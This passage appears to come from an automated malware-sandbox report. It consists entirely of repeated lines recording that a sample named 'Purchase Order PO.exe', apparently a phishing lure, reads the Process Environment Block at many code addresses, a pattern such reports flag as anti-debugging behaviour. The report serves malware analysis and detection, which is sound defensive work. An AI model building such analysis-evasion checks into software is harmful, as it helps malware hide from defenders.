                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC0124 mov eax, dword ptr fs:[00000030h]2_2_01AC0124
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B50115 mov eax, dword ptr fs:[00000030h]2_2_01B50115
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3A118 mov ecx, dword ptr fs:[00000030h]2_2_01B3A118
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3A118 mov eax, dword ptr fs:[00000030h]2_2_01B3A118
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3A118 mov eax, dword ptr fs:[00000030h]2_2_01B3A118
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3A118 mov eax, dword ptr fs:[00000030h]2_2_01B3A118
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov eax, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov ecx, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov eax, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov eax, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov ecx, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov eax, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov eax, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov ecx, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov eax, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E10E mov ecx, dword ptr fs:[00000030h]2_2_01B3E10E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B28158 mov eax, dword ptr fs:[00000030h]2_2_01B28158
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B24144 mov eax, dword ptr fs:[00000030h]2_2_01B24144
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B24144 mov eax, dword ptr fs:[00000030h]2_2_01B24144
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B24144 mov ecx, dword ptr fs:[00000030h]2_2_01B24144
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B24144 mov eax, dword ptr fs:[00000030h]2_2_01B24144
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B24144 mov eax, dword ptr fs:[00000030h]2_2_01B24144
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96154 mov eax, dword ptr fs:[00000030h]2_2_01A96154
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96154 mov eax, dword ptr fs:[00000030h]2_2_01A96154
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8C156 mov eax, dword ptr fs:[00000030h]2_2_01A8C156
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B560B8 mov eax, dword ptr fs:[00000030h]2_2_01B560B8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B560B8 mov ecx, dword ptr fs:[00000030h]2_2_01B560B8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B280A8 mov eax, dword ptr fs:[00000030h]2_2_01B280A8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9208A mov eax, dword ptr fs:[00000030h]2_2_01A9208A
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A980E9 mov eax, dword ptr fs:[00000030h]2_2_01A980E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A0E3 mov ecx, dword ptr fs:[00000030h]2_2_01A8A0E3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B160E0 mov eax, dword ptr fs:[00000030h]2_2_01B160E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8C0F0 mov eax, dword ptr fs:[00000030h]2_2_01A8C0F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD20F0 mov ecx, dword ptr fs:[00000030h]2_2_01AD20F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B120DE mov eax, dword ptr fs:[00000030h]2_2_01B120DE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26030 mov eax, dword ptr fs:[00000030h]2_2_01B26030
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A020 mov eax, dword ptr fs:[00000030h]2_2_01A8A020
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8C020 mov eax, dword ptr fs:[00000030h]2_2_01A8C020
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B14000 mov ecx, dword ptr fs:[00000030h]2_2_01B14000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B32000 mov eax, dword ptr fs:[00000030h]2_2_01B32000
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE016 mov eax, dword ptr fs:[00000030h]2_2_01AAE016
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE016 mov eax, dword ptr fs:[00000030h]2_2_01AAE016
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE016 mov eax, dword ptr fs:[00000030h]2_2_01AAE016
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE016 mov eax, dword ptr fs:[00000030h]2_2_01AAE016
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABC073 mov eax, dword ptr fs:[00000030h]2_2_01ABC073
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B16050 mov eax, dword ptr fs:[00000030h]2_2_01B16050
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A92050 mov eax, dword ptr fs:[00000030h]2_2_01A92050
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E388 mov eax, dword ptr fs:[00000030h]2_2_01A8E388
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E388 mov eax, dword ptr fs:[00000030h]2_2_01A8E388
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8E388 mov eax, dword ptr fs:[00000030h]2_2_01A8E388
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB438F mov eax, dword ptr fs:[00000030h]2_2_01AB438F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB438F mov eax, dword ptr fs:[00000030h]2_2_01AB438F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A88397 mov eax, dword ptr fs:[00000030h]2_2_01A88397
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A88397 mov eax, dword ptr fs:[00000030h]2_2_01A88397
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A88397 mov eax, dword ptr fs:[00000030h]2_2_01A88397
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA03E9 mov eax, dword ptr fs:[00000030h]2_2_01AA03E9
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC63FF mov eax, dword ptr fs:[00000030h]2_2_01AC63FF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE3F0 mov eax, dword ptr fs:[00000030h]2_2_01AAE3F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE3F0 mov eax, dword ptr fs:[00000030h]2_2_01AAE3F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE3F0 mov eax, dword ptr fs:[00000030h]2_2_01AAE3F0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B343D4 mov eax, dword ptr fs:[00000030h]2_2_01B343D4
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B343D4 mov eax, dword ptr fs:[00000030h]2_2_01B343D4
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E3DB mov eax, dword ptr fs:[00000030h]2_2_01B3E3DB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E3DB mov eax, dword ptr fs:[00000030h]2_2_01B3E3DB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E3DB mov ecx, dword ptr fs:[00000030h]2_2_01B3E3DB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3E3DB mov eax, dword ptr fs:[00000030h]2_2_01B3E3DB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A3C0 mov eax, dword ptr fs:[00000030h]2_2_01A9A3C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A3C0 mov eax, dword ptr fs:[00000030h]2_2_01A9A3C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A3C0 mov eax, dword ptr fs:[00000030h]2_2_01A9A3C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A3C0 mov eax, dword ptr fs:[00000030h]2_2_01A9A3C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A3C0 mov eax, dword ptr fs:[00000030h]2_2_01A9A3C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A3C0 mov eax, dword ptr fs:[00000030h]2_2_01A9A3C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A983C0 mov eax, dword ptr fs:[00000030h]2_2_01A983C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A983C0 mov eax, dword ptr fs:[00000030h]2_2_01A983C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A983C0 mov eax, dword ptr fs:[00000030h]2_2_01A983C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A983C0 mov eax, dword ptr fs:[00000030h]2_2_01A983C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B163C0 mov eax, dword ptr fs:[00000030h]2_2_01B163C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B4C3CD mov eax, dword ptr fs:[00000030h]2_2_01B4C3CD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA30B mov eax, dword ptr fs:[00000030h]2_2_01ACA30B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA30B mov eax, dword ptr fs:[00000030h]2_2_01ACA30B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA30B mov eax, dword ptr fs:[00000030h]2_2_01ACA30B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8C310 mov ecx, dword ptr fs:[00000030h]2_2_01A8C310
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB0310 mov ecx, dword ptr fs:[00000030h]2_2_01AB0310
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3437C mov eax, dword ptr fs:[00000030h]2_2_01B3437C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B38350 mov ecx, dword ptr fs:[00000030h]2_2_01B38350
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5A352 mov eax, dword ptr fs:[00000030h]2_2_01B5A352
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1035C mov eax, dword ptr fs:[00000030h]2_2_01B1035C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1035C mov eax, dword ptr fs:[00000030h]2_2_01B1035C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1035C mov eax, dword ptr fs:[00000030h]2_2_01B1035C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1035C mov ecx, dword ptr fs:[00000030h]2_2_01B1035C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1035C mov eax, dword ptr fs:[00000030h]2_2_01B1035C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1035C mov eax, dword ptr fs:[00000030h]2_2_01B1035C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B12349 mov eax, dword ptr fs:[00000030h]2_2_01B12349
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA02A0 mov eax, dword ptr fs:[00000030h]2_2_01AA02A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA02A0 mov eax, dword ptr fs:[00000030h]2_2_01AA02A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B262A0 mov eax, dword ptr fs:[00000030h]2_2_01B262A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B262A0 mov ecx, dword ptr fs:[00000030h]2_2_01B262A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B262A0 mov eax, dword ptr fs:[00000030h]2_2_01B262A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B262A0 mov eax, dword ptr fs:[00000030h]2_2_01B262A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B262A0 mov eax, dword ptr fs:[00000030h]2_2_01B262A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B262A0 mov eax, dword ptr fs:[00000030h]2_2_01B262A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE284 mov eax, dword ptr fs:[00000030h]2_2_01ACE284
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE284 mov eax, dword ptr fs:[00000030h]2_2_01ACE284
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B10283 mov eax, dword ptr fs:[00000030h]2_2_01B10283
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B10283 mov eax, dword ptr fs:[00000030h]2_2_01B10283
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B10283 mov eax, dword ptr fs:[00000030h]2_2_01B10283
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA02E1 mov eax, dword ptr fs:[00000030h]2_2_01AA02E1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA02E1 mov eax, dword ptr fs:[00000030h]2_2_01AA02E1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA02E1 mov eax, dword ptr fs:[00000030h]2_2_01AA02E1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9A2C3 mov eax, dword ptr fs:[00000030h]2_2_01A9A2C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8823B mov eax, dword ptr fs:[00000030h]2_2_01A8823B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B40274 mov eax, dword ptr fs:[00000030h]2_2_01B40274
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8826B mov eax, dword ptr fs:[00000030h]2_2_01A8826B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94260 mov eax, dword ptr fs:[00000030h]2_2_01A94260
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94260 mov eax, dword ptr fs:[00000030h]2_2_01A94260
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94260 mov eax, dword ptr fs:[00000030h]2_2_01A94260
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96259 mov eax, dword ptr fs:[00000030h]2_2_01A96259
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B18243 mov eax, dword ptr fs:[00000030h]2_2_01B18243
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B18243 mov ecx, dword ptr fs:[00000030h]2_2_01B18243
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A250 mov eax, dword ptr fs:[00000030h]2_2_01A8A250
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B105A7 mov eax, dword ptr fs:[00000030h]2_2_01B105A7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B105A7 mov eax, dword ptr fs:[00000030h]2_2_01B105A7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B105A7 mov eax, dword ptr fs:[00000030h]2_2_01B105A7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB45B1 mov eax, dword ptr fs:[00000030h]2_2_01AB45B1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB45B1 mov eax, dword ptr fs:[00000030h]2_2_01AB45B1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC4588 mov eax, dword ptr fs:[00000030h]2_2_01AC4588
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A92582 mov eax, dword ptr fs:[00000030h]2_2_01A92582
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A92582 mov ecx, dword ptr fs:[00000030h]2_2_01A92582
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE59C mov eax, dword ptr fs:[00000030h]2_2_01ACE59C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC5ED mov eax, dword ptr fs:[00000030h]2_2_01ACC5ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC5ED mov eax, dword ptr fs:[00000030h]2_2_01ACC5ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A925E0 mov eax, dword ptr fs:[00000030h]2_2_01A925E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE5E7 mov eax, dword ptr fs:[00000030h]2_2_01ABE5E7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE5CF mov eax, dword ptr fs:[00000030h]2_2_01ACE5CF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACE5CF mov eax, dword ptr fs:[00000030h]2_2_01ACE5CF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A965D0 mov eax, dword ptr fs:[00000030h]2_2_01A965D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA5D0 mov eax, dword ptr fs:[00000030h]2_2_01ACA5D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA5D0 mov eax, dword ptr fs:[00000030h]2_2_01ACA5D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABE53E mov eax, dword ptr fs:[00000030h]2_2_01ABE53E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0535 mov eax, dword ptr fs:[00000030h]2_2_01AA0535
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26500 mov eax, dword ptr fs:[00000030h]2_2_01B26500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64500 mov eax, dword ptr fs:[00000030h]2_2_01B64500
